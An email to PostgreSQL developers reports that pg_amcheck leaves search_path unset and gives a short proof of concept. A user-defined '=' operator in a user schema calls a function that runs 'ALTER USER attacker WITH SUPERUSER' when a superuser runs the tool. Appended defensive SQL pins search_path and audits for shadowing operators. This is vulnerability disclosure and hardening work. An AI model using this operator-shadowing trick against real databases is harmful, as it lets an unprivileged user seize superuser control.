Hi, hackers!
As I see, pg_amcheck doesn't set search_path.
It runs SQL queries like:
SELECT n.nspname, x.extversion FROM pg_catalog.pg_extension x JOIN
pg_catalog.pg_namespace n ON x.extnamespace = n.oid WHERE x.extname =
'amcheck'
Let's suppose search_path for the database is set:
search_path = 'myschema, pg_catalog'
Then
CREATE FUNCTION myschema.evil(name, name) RETURNS bool AS $$
ALTER USER attacker WITH SUPERUSER;
SELECT $1 OPERATOR(pg_catalog.=) $2;
$$ LANGUAGE sql;
CREATE OPERATOR myschema.= (LEFTARG = name, RIGHTARG = name,
PROCEDURE = myschema.evil);
Then run pg_amcheck as superuser.
So the user attacker can become SUPERUSER.
Is this scenario worth fixing?
Regards,
Pavel Borisov
Supabase
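As an added example (not code from the email above and not pg_amcheck's own source), the two defender-side pieces this report points at: pinning search_path for the session and schema-qualifying the operator in the catalog query, followed by an audit query that lists user-created operators whose name and operand types shadow a pg_catalog operator, which is what the myschema.= operator in the scenario would look like to a DBA. The column names used are the real pg_operator / pg_namespace / pg_proc columns; the schema filter list is an assumption and should be extended with any trusted schemas of your own.

```sql
-- Added example, not pg_amcheck's code.
-- 1. Hardened form of the extension-lookup query from the report.
--    Pin search_path first so unqualified names cannot resolve into a
--    user-writable schema, then spell out the operator's schema anyway.
SELECT pg_catalog.set_config('search_path', 'pg_catalog', false);

SELECT n.nspname, x.extversion
FROM pg_catalog.pg_extension x
JOIN pg_catalog.pg_namespace n ON x.extnamespace OPERATOR(pg_catalog.=) n.oid
WHERE x.extname OPERATOR(pg_catalog.=) 'amcheck';

-- 2. Audit: operators outside the system schemas that have the same name
--    and operand types as a pg_catalog operator. Any row here is a
--    candidate for search_path shadowing and should be reviewed, together
--    with the function it calls and who owns it.
SELECT n.nspname                                   AS schema,
       o.oprname                                   AS operator,
       pg_catalog.format_type(o.oprleft, NULL)     AS left_type,
       pg_catalog.format_type(o.oprright, NULL)    AS right_type,
       pn.nspname OPERATOR(pg_catalog.||) '.' OPERATOR(pg_catalog.||) p.proname
                                                   AS implemented_by,
       pg_catalog.pg_get_userbyid(o.oprowner)      AS owner
FROM pg_catalog.pg_operator o
JOIN pg_catalog.pg_namespace n  ON n.oid  OPERATOR(pg_catalog.=) o.oprnamespace
JOIN pg_catalog.pg_proc p       ON p.oid  OPERATOR(pg_catalog.=) o.oprcode
JOIN pg_catalog.pg_namespace pn ON pn.oid OPERATOR(pg_catalog.=) p.pronamespace
WHERE n.nspname NOT IN ('pg_catalog', 'information_schema')  -- assumed list
  AND EXISTS (
        SELECT 1
        FROM pg_catalog.pg_operator b
        JOIN pg_catalog.pg_namespace bn ON bn.oid OPERATOR(pg_catalog.=) b.oprnamespace
        WHERE bn.nspname OPERATOR(pg_catalog.=) 'pg_catalog'
          AND b.oprname  OPERATOR(pg_catalog.=) o.oprname
          AND b.oprleft  OPERATOR(pg_catalog.=) o.oprleft
          AND b.oprright OPERATOR(pg_catalog.=) o.oprright)
ORDER BY 1, 2;
```

In the scenario from the report, the audit query returns one row: schema myschema, operator =, left_type name, right_type name, implemented_by myschema.evil. The set_config call is the same mitigation other PostgreSQL client utilities such as pg_dump apply to their own catalog queries; it has to be issued once per connection before any other statement, since a database-level search_path takes effect at login.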